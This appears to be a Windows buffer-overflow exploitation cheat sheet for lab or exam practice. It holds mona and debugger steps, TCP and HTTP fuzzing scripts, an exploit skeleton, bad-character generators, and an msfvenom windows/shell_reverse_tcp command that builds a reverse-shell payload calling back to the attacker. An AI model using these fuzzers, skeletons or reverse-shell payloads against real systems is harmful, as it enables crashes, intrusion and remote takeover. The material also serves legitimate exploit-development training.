# Windows

## 00. Basic Process

```bash
## ------------------| Setup Immunity Debugger
## Run Immunity Debugger as an admin user.
## Press CTRL + F1 to attach to the service.

## ------------------| Config Mona
!mona config -set workingfolder c:\mona\%p

## ------------------| Fuzzing
## Run the fuzzing script to find the buffer size that crashes the program.
## If the program crashed when it hit a buffer size of 2000,
## use 2400 or 2600 as the <BufferSize> value below.

## ------------------| Find the offset value
## Create a cyclic pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <BufferSize>
## After the crash, copy the EIP value and look it up in the pattern
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP_ADDRESS>
## Or you can use mona to find the offset value as well.
!mona findmsp -distance <BufferSize>
## To verify the offset, use a buffer like the following
buff = "A" * offset + "B" * 4
## You should then see EIP as 42424242.

## ------------------| Find bad characters
## Copy the following as badchars
badchars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"                   
## Edit the payload buffer as follows
buff = "A" * offset + "B" * 4 + badchars
## After sending the evil buffer, right-click the ESP value and select Follow in Dump.
## You can then see the byte values in the hex dump pane.
## Or you can let mona do the comparison for you
!mona bytearray -b "\x00"
!mona compare -f C:\mona\<ProgramName>\bytearray.bin -a <ESP_ADDRESS>
## Repeat (excluding the newly found bad chars with -b) until the status is unmodified

## ------------------| Find the return address
!mona jmp -r esp -cpb "<Bad_Chars>"
## Then look in the Log data (2) window
## Copy one of the addresses. Ex: 0F9E24F9
## Convert it to little-endian format. Ex: \xF9\x24\x9E\x0F
## Your buffer should now look like the following
buff = "A" * offset + "\xF9\x24\x9E\x0F"
## Before running the program, set a breakpoint on the 0F9E24F9 address.

## ------------------| Create the payload
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4545 EXITFUNC=thread -b "\x00" -f c
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=<PORT> EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00"
## Paste the hex values as follows
payload = ("\xbd........\xb1"
"........"
".....")
## Your final buffer should look like the following
buff = "A" * offset + "\xF9\x24\x9E\x0F" + "\x90" * 16 + payload
```
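The pattern_create / pattern_offset / little-endian steps above, worked through in code. This is an added example, not from the original page: it reimplements the Metasploit cyclic-pattern algorithm in Python and models the crash with a constructed buffer in which EIP is assumed to be overwritten at byte 146.

```python
#!/usr/bin/env python3
"""Cyclic-pattern offset finding: what pattern_create.rb, pattern_offset.rb and
the little-endian conversion above actually do. Added example, not from the
original page; the crash below is constructed (EIP assumed overwritten at byte 146)."""
import struct
from string import ascii_uppercase, ascii_lowercase, digits

# One period of the Metasploit pattern: Aa0 Aa1 ... Zz9 (26*26*10 triples = 20280 chars).
# Every 4-byte window is unique within one period, which is what makes the lookup work.
_PERIOD = "".join(u + l + d for u in ascii_uppercase for l in ascii_lowercase for d in digits)


def pattern_create(length: int) -> str:
    """Equivalent of pattern_create.rb -l <length>."""
    return (_PERIOD * (length // len(_PERIOD) + 1))[:length]


def to_le_bytes(addr_hex: str) -> bytes:
    """Turn an address as the debugger shows it (0F9E24F9) into the byte order it
    needs inside the buffer (\\xF9\\x24\\x9E\\x0F): x86 is little-endian."""
    return struct.pack("<I", int(addr_hex, 16))


def eip_after_crash(buf: bytes, offset: int) -> int:
    """Model of the crash: EIP receives the 4 bytes at `offset`, read little-endian."""
    return struct.unpack("<I", buf[offset:offset + 4])[0]


def pattern_offset(eip_hex: str, length: int):
    """Equivalent of pattern_offset.rb -q <EIP>: undo the little-endian read and find
    those 4 characters in the pattern. None means EIP did not come from the pattern
    (e.g. 42424242 from the "B" * 4 verification buffer). For buffers longer than one
    period (20280) the first match is returned and may be ambiguous."""
    needle = to_le_bytes(eip_hex).decode("latin-1")
    idx = pattern_create(length).find(needle)
    return None if idx < 0 else idx


if __name__ == "__main__":
    size = 2400                                  # the <BufferSize> that crashed the program
    buf = pattern_create(size).encode("latin-1")
    eip = eip_after_crash(buf, 146)              # constructed crash: EIP overwritten at byte 146
    print(f"EIP = {eip:08X}")                    # 39654138
    print("offset =", pattern_offset(f"{eip:08X}", size))    # 146
    # Verification step from section 00: "A" * offset + "B" * 4 must give EIP 42424242.
    check = b"A" * 146 + b"B" * 4
    print(f"verify EIP = {eip_after_crash(check, 146):08X}")  # 42424242
    print(to_le_bytes("0F9E24F9"))               # b'\xf9$\x9e\x0f'
```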

## 01. Fuzzing Skeletons

* Basic

```python
#!/usr/bin/env python3
import socket, time, sys

host = '192.168.228.10'
port = 110

buf = "A" * 1000

# Send a growing USER argument until the service stops responding.
while True:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.recv(1024)                                     # banner
    s.send(bytes('USER ' + buf + '\r\n', "latin-1"))
    s.recv(1024)
    s.send(bytes('QUIT\r\n', "latin-1"))
    s.close()
    print("Sent buffer of {} bytes!".format(len(buf)))
    time.sleep(1)
    buf += "A" * 1000
```

* Source : [Tib3rius](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst)

```python
#!/usr/bin/env python3
import socket, time, sys

ip = "10.10.11.32"
port = 1337
prefix = "STATS "

timeout = 5
string = prefix + "A" * 100

print("================[ Fuzzing Start ]=================")
while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("[+] Fuzzing {} bytes...".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("-" * 50)
    print("\033[38;5;208m[!]\033[0;0m Program crashed at\033[92m {}\033[00m bytes !".format(len(string) - len(prefix)))
    print("-" * 50)
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)
```

* HTTP Fuzzer

```python
#!/usr/bin/python3

import socket, time, sys

host = "127.0.0.1"
port = 80
uri = "/login"

buff_size = 100

while buff_size < 2000:
  try:
    print(f'[+] Sending malicious buffer with {buff_size} ..!')
    input_buffer = "A" * buff_size
    post_data = f'username={input_buffer}&password=test'
    #print(post_data)
    buffer =  f'POST {uri} HTTP/1.1\r\n'
    buffer += f'Host: {host}\r\n'
    buffer += 'Content-Type: application/x-www-form-urlencoded\r\n'
    buffer += f'Content-Length: {len(post_data)}\r\n'
    buffer += '\r\n'
    buffer += post_data

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(buffer.encode())
    s.close()
    buff_size += 100
    time.sleep(10)

  except:
    print("[-] Could not connect!")
    sys.exit()
```

## 02. Crash Replication & Controlling EIP

* Source : [Tib3rius](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst)
* Exploit Skeleton

```python
#!/usr/bin/env python3
import socket

ip = "10.10.11.32"
port = 1337
prefix = "STATS "

offset = 0
overflow = "A" * offset
retn = ""       # 625011AF <--> \xaf\x11\x50\x62
padding = ""    # "\x90" * 16
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("-" * 50)
  print("[!] Sending the buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("\033[38;5;208m[+]\033[0;0m Done!")
  print("-" * 50)
except:
  print("[*] Unable to connect!")
```

## 03. Generate bad chars

* From [joshua17sc](https://github.com/joshua17sc/Buffer-Overflows/blob/main/create.py)

```python
#!/usr/bin/env python3

# Start with 00 and add any others you find
bad = "00".split()

# Turns the remaining bytes into a string to copy into python
print("badchars = ")
for x in range(1, 256):
    if "{:02x}".format(x) not in bad:
        print("\\x" + "{:02x}".format(x), end='')

# Creates a string of the excluded bytes to use in Mona
print("\n\nfor mona")
for byte in bad:
    print("\\x{}".format(byte), end='')
print()
```

```python
#!/usr/bin/env python3
for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()
```
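The generators above produce what gets sent; the other half of the step is checking what arrived. As an added example (not from the page or from joshua17sc's repo), this is the comparison `!mona compare` performs, run against a constructed memory dump that shows both ways a byte fails: mangled in place, and truncating the copy.

```python
#!/usr/bin/env python3
"""What `!mona compare` does: diff the bad-char array that was sent against the
bytes actually found at ESP after the crash. Added example, not from the page or
from joshua17sc's repo. The memory dump is constructed to show both failure modes."""


def build_badchars(exclude=(0x00,)) -> bytes:
    """Same bytes the generator above prints: 0x01..0xff minus the known bad ones."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def compare(sent: bytes, observed: bytes) -> dict:
    """Walk both buffers in step. A byte is reported if it changed in place
    (mangled) or if the copy ends before it (truncated, the usual sign of a
    string terminator). Status labels are this script's own, not mona's exact text."""
    bad, status = [], "unmodified"
    for i, b in enumerate(sent):
        if i >= len(observed):          # nothing left in memory: the copy stopped here
            bad.append(b)
            status = "truncated"
            break
        if observed[i] != b:            # present but altered
            bad.append(b)
            status = "corrupted"
    return {"status": status, "bad": bad,
            "mona": "".join(f"\\x{b:02x}" for b in bad)}   # paste into -cpb / the exclude list


# Constructed dump: the target mangled 0x0a (and clobbered the 0x0b right after it,
# a common side effect) and stopped copying at 0x40.
SENT = build_badchars()
_dump = bytearray(SENT)
_dump[SENT.index(0x0a)] = 0x00
_dump[SENT.index(0x0b)] = 0x00
OBSERVED = bytes(_dump[:SENT.index(0x40)])

if __name__ == "__main__":
    result = compare(SENT, OBSERVED)
    print(result["status"], result["mona"])     # truncated \x0a\x0b\x40
    # A byte flagged right after a bad one may be collateral damage rather than bad
    # itself, so exclude the confirmed ones, resend, and compare again until the
    # status is unmodified (the loop described in section 00).
    retry = build_badchars(exclude=(0x00, 0x0a, 0x40))
    print(len(retry), "bytes in the next round")     # 253
```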

## 04. Mona Scripts

```bash
# -----------------| Configure mona for current running application
!mona config -set workingfolder c:\mona\%p

# -----------------| Finding the crash
!mona findmsp -distance 600

# -----------------| Finding the bad chars
!mona bytearray -b "\x00"
!mona compare -f C:\mona\bytearray.bin -a <address>

# -----------------| Finding a Jump Point
!mona jmp -r esp -cpb "\x00"       
```

## 05. Spiking

```bash
./generic_send_tcp <IP/HOST> <PORT> script.spk 0 0

# -----------| spike script template
s_readline();
s_string("CMD ");
s_string_variable("0");
```
